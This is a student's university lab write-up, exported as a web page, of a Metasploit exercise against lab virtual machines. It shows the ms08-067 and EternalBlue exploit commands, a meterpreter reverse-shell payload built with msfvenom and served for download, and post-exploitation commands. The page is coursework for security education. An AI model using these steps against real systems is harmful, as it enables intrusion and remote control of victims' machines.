{"id":232,"date":"2026-05-03T10:39:47","date_gmt":"2026-05-03T10:39:47","guid":{"rendered":"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/?page_id=232"},"modified":"2026-05-03T23:57:02","modified_gmt":"2026-05-03T23:57:02","slug":"ethical-hacking","status":"publish","type":"page","link":"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/ethical-hacking\/","title":{"rendered":"Ethical Hacking"},"content":{"rendered":"\n<p>TASK A:&nbsp;<\/p>\n\n\n\n<ol>\n<li>Run a port scan against the Windows XP using the nmap command to identify open ports and services.<\/li>\n<\/ol>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"908\" height=\"935\" src=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.1.png\" alt=\"\" class=\"wp-image-240\" srcset=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.1.png 908w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.1-291x300.png 291w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.1-768x791.png 768w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.1-833x858.png 833w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.1-186x192.png 186w\" sizes=\"(max-width: 908px) 100vw, 908px\" \/><\/figure>\n\n\n\n<p>I used the command, nmap 192.168.10.14 to do a general scan on the Windows XP machine, then I used the command nmap -p445 192.168.10.14 to ensure that port 445 was open.&nbsp;<\/p>\n\n\n\n<ol start=\"2\">\n<li>Launch Metasploit Framework and search for the exploit module: <strong>ms08_067_netapi.<\/strong><\/li>\n<\/ol>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"908\" height=\"927\" src=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.2.png\" alt=\"\" class=\"wp-image-244\" srcset=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.2.png 908w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.2-294x300.png 294w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.2-768x784.png 768w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.2-833x850.png 833w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.2-188x192.png 188w\" sizes=\"(max-width: 908px) 100vw, 908px\" \/><\/figure>\n\n\n\n<p>I used the command, search ms08_067_netapi, to get more information on the module. I was presented with one option, with 0 as the option number. I used the command, info 0 to get more information on the module.&nbsp;<\/p>\n\n\n\n<p>3-4.) Use ms08_067_netapi as the exploit module and set meterpreter reverse_tcp as the payload. Use 5525 as the listening port number. Configure the rest of the parameters. Display your configurations and exploit the target.\u00a0<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"907\" height=\"923\" src=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.4.png\" alt=\"\" class=\"wp-image-248\" srcset=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.4.png 907w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.4-295x300.png 295w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.4-768x782.png 768w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.4-833x848.png 833w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.4-189x192.png 189w\" sizes=\"(max-width: 907px) 100vw, 907px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"907\" height=\"933\" src=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.5.png\" alt=\"\" class=\"wp-image-249\" srcset=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.5.png 907w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.5-292x300.png 292w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.5-768x790.png 768w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.5-833x857.png 833w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.5-187x192.png 187w\" sizes=\"(max-width: 907px) 100vw, 907px\" \/><\/figure>\n\n\n\n<p>I used the command, use 0, to use option 0 as the exploit module. After that, I used the command set payload windows\/meterpreter\/reverse_tcp, to set the payload. I used the commands, set lport 4428 to set the listening port #, and set rhost 192.168.10.14 to set the remote host IP (to the Windows XP VM). Finally, I executed the exploit command to begin the process.&nbsp;<\/p>\n\n\n\n<p>5-9.)&nbsp; [Post-exploitation] Execute the screenshot command to take a screenshot of the target machine if the exploit is successful. In the meterpreter shell, display the target system\u2019s local date and time. In the meterpreter shell, get the SID of the user. In the meterpreter shell, get the current process identifier. In the meterpreter shell, get system information about the target.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1022\" height=\"927\" src=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.6SUCCESS.png\" alt=\"\" class=\"wp-image-250\" srcset=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.6SUCCESS.png 1022w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.6SUCCESS-300x272.png 300w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.6SUCCESS-768x697.png 768w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.6SUCCESS-833x756.png 833w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.6SUCCESS-192x174.png 192w\" sizes=\"(max-width: 1022px) 100vw, 1022px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1020\" height=\"331\" src=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.7.png\" alt=\"\" class=\"wp-image-251\" srcset=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.7.png 1020w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.7-300x97.png 300w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.7-768x249.png 768w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.7-833x270.png 833w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.7-192x62.png 192w\" sizes=\"(max-width: 1020px) 100vw, 1020px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1023\" height=\"936\" src=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.allpostexploittasksfortaskA.png\" alt=\"\" class=\"wp-image-252\" srcset=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.allpostexploittasksfortaskA.png 1023w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.allpostexploittasksfortaskA-300x274.png 300w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.allpostexploittasksfortaskA-768x703.png 768w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.allpostexploittasksfortaskA-833x762.png 833w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.allpostexploittasksfortaskA-192x176.png 192w\" sizes=\"(max-width: 1023px) 100vw, 1023px\" \/><\/figure>\n\n\n\n<p>I used the command, screenshot, to take a screenshot of the Windows XP machine; it was quite grainy with mismatched colors. I used the command, localtime, to get the target VM\u2019s local date and time. I used the command, getsid, to get the VM\u2019s user SID. I used the command, getpid, to get the VM\u2019s current process identifier. I used the command, sysinfo, to get information about the target VM.&nbsp;<\/p>\n\n\n\n<p>TASK B:&nbsp;<\/p>\n\n\n\n<p>1B.) Port Scan\/Ensure that Port # 445 is open.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"987\" height=\"512\" src=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.1b.png\" alt=\"\" class=\"wp-image-253\" srcset=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.1b.png 987w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.1b-300x156.png 300w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.1b-768x398.png 768w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.1b-833x432.png 833w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.1b-192x100.png 192w\" sizes=\"(max-width: 987px) 100vw, 987px\" \/><\/figure>\n\n\n\n<p>I used the command, nmap 192.168.10.19 to see which ports were open on the Windows Server 2022 VM; port # 445 was open.&nbsp;<\/p>\n\n\n\n<p>2B.) Search for the proper exploit, ms17-010.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"983\" height=\"926\" src=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.2b.png\" alt=\"\" class=\"wp-image-254\" srcset=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.2b.png 983w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.2b-300x283.png 300w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.2b-768x723.png 768w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.2b-833x785.png 833w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.2b-192x181.png 192w\" sizes=\"(max-width: 983px) 100vw, 983px\" \/><\/figure>\n\n\n\n<p>I searched for the EternalBlue module, or ms17-010, and was presented with 4 results. I&nbsp; continued with option 0.&nbsp;<\/p>\n\n\n\n<p>3B.) Use the proper exploit module and set the lhost\/rhost. Finally, set the payload.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"925\" src=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.3b-1024x925.png\" alt=\"\" class=\"wp-image-255\" srcset=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.3b-1024x925.png 1024w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.3b-300x271.png 300w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.3b-768x694.png 768w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.3b-833x752.png 833w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.3b-192x173.png 192w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.3b.png 1033w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>I used the command, use 0, to select an exploit module. I used the command, set lport 5525 to set the listening port # to 5525. I used the command, set rhost 192.168.10.19 to set the remote host as the Windows Server 2022 VM. Finally, I used the command, set payload windows\/x64\/meterpreter\/reverse_tcp to set the payload.&nbsp;<\/p>\n\n\n\n<p>4B.) Display the configurations.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"482\" src=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.4b-1024x482.png\" alt=\"\" class=\"wp-image-256\" srcset=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.4b-1024x482.png 1024w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.4b-300x141.png 300w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.4b-768x361.png 768w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.4b-833x392.png 833w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.4b-192x90.png 192w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.4b.png 1037w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"967\" height=\"265\" src=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.4bb.png\" alt=\"\" class=\"wp-image-257\" srcset=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.4bb.png 967w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.4bb-300x82.png 300w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.4bb-768x210.png 768w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.4bb-833x228.png 833w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.4bb-192x53.png 192w\" sizes=\"(max-width: 967px) 100vw, 967px\" \/><\/figure>\n\n\n\n<p>I used the command, show options to display the configurations.&nbsp;<\/p>\n\n\n\n<p>5B.) Exploit, display the results.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1001\" height=\"932\" src=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.5b.png\" alt=\"\" class=\"wp-image-258\" srcset=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.5b.png 1001w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.5b-300x279.png 300w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.5b-768x715.png 768w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.5b-833x776.png 833w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.5b-192x179.png 192w\" sizes=\"(max-width: 1001px) 100vw, 1001px\" \/><\/figure>\n\n\n\n<p>I used the exploit command to begin the exploit but was unsuccessful because the host was not vulnerable.&nbsp;<\/p>\n\n\n\n<p>TASK C:&nbsp;<\/p>\n\n\n\n<p>1C.) Once your payload is ready, you should upload it to the web server running on Kali Linux and, download the payload from Windows 7, then execute it on the target to make a reverse shell. Of course, don&#8217;t forget to configure your Metasploit on Kali Linux before the payload is triggered on the target VM.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"860\" height=\"782\" src=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC1.png\" alt=\"\" class=\"wp-image-260\" srcset=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC1.png 860w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC1-300x273.png 300w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC1-768x698.png 768w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC1-833x757.png 833w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC1-192x175.png 192w\" sizes=\"(max-width: 860px) 100vw, 860px\" \/><\/figure>\n\n\n\n<p>I used the command, msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=192.168.10.13 LPORT=4428 -f exe -o jkaur0051.exe, to create the payload. I copied the file to the server using cp jkaur0051.exe \/var\/www\/html. I checked to see if the transfer was successful using the ls \/var\/www\/html command.&nbsp;<\/p>\n\n\n\n<p>2C.) Establish a successful connection:&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"856\" src=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC2-1024x856.png\" alt=\"\" class=\"wp-image-261\" srcset=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC2-1024x856.png 1024w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC2-300x251.png 300w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC2-768x642.png 768w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC2-833x696.png 833w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC2-192x160.png 192w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC2.png 1107w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>I went into multi\/handler to configure the payload options. I used the command, set lport 4428 to set the listening port # to the one specified in the executable payload.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"730\" src=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC3-1024x730.png\" alt=\"\" class=\"wp-image-262\" srcset=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC3-1024x730.png 1024w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC3-300x214.png 300w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC3-768x548.png 768w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC3-833x594.png 833w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC3-192x137.png 192w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC3.png 1293w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>I downloaded the file and ran it on the target VM, which resulted in a connection between the Internal Kali and Windows 7 VMs.<\/p>\n\n\n\n<p>3C.) Execute the screenshot command to take a screenshot of the target machine if the exploit is successful.\u00a0<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"865\" src=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC4-1024x865.png\" alt=\"\" class=\"wp-image-263\" srcset=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC4-1024x865.png 1024w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC4-300x254.png 300w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC4-768x649.png 768w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC4-833x704.png 833w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC4-192x162.png 192w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC4.png 1097w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>I used the command, screenshot, to take a screenshot of the Windows 7 VM; it was saved as rvuVrzyr.jpeg.\u00a0<\/p>\n\n\n\n<p>4C.) Create a text file on the attacker Kali named &#8220;YourMIDAS.txt&#8221; (replace YourMIDAS with your university MIDAS ID) and put the current timestamp in the file. Upload this file to the target&#8217;s desktop. Then, log in to Windows 7 VM and check if the file exists. You need to show me the command that uploads the file.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"806\" height=\"791\" src=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC5.png\" alt=\"\" class=\"wp-image-264\" srcset=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC5.png 806w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC5-300x294.png 300w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC5-768x754.png 768w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC5-192x188.png 192w\" sizes=\"(max-width: 806px) 100vw, 806px\" \/><\/figure>\n\n\n\n<p>I used the command, echo \u201c$(date)\u201d &gt;&gt; jkaur005.txt&nbsp; to create a text file with the current timestamp in the Internal Kali VM.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"905\" height=\"791\" src=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC6.png\" alt=\"\" class=\"wp-image-265\" srcset=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC6.png 905w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC6-300x262.png 300w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC6-768x671.png 768w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC6-833x728.png 833w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC6-192x168.png 192w\" sizes=\"(max-width: 905px) 100vw, 905px\" \/><\/figure>\n\n\n\n<p>I used the command, upload jkaur005.txt, to upload the file to the target VM.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"733\" src=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC7-1024x733.png\" alt=\"\" class=\"wp-image-266\" srcset=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC7-1024x733.png 1024w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC7-300x215.png 300w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC7-768x550.png 768w, 